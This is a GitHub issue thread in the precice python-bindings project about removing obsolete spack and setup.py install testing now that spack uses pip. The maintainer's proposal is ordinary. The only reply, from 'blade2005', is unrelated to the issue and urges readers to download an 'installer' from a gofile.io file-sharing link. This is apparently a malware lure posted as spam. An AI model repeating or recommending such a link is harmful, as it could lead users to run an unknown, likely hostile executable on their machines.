### ISSUE TITLE
Spack testing obsolete

### ISSUE THREAD

**Issue by fsimonis** [precice/python-bindings#220]
The tests of the python bindings to keep spack working involves many layers as spack used to install packages by calling setup.py as follows:

```
$ python setup.py build
$ python setup.py install --root=...
```

As the python bindings are native extensions of precice using cython, this involved additional steps that needed testing.

Spack changed to directly using `pip install` in https://github.com/spack/spack/pull/27798.
Meaning that we no longer need to test `setup.py` calls and the installation of the python bindings becomes significantly simpler and more robust.

I suggest to:
* remove testing of setup.py calls which are anyhow deprecated.
* remove testing of spack builds in the CI, including the generation of the build image and the checked-in spack package files.
* remove the explicit checks for a pip environment in the `setup.py`. 

This allows us to more aggressively push #208 and #217.

**Comment by blade2005** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer
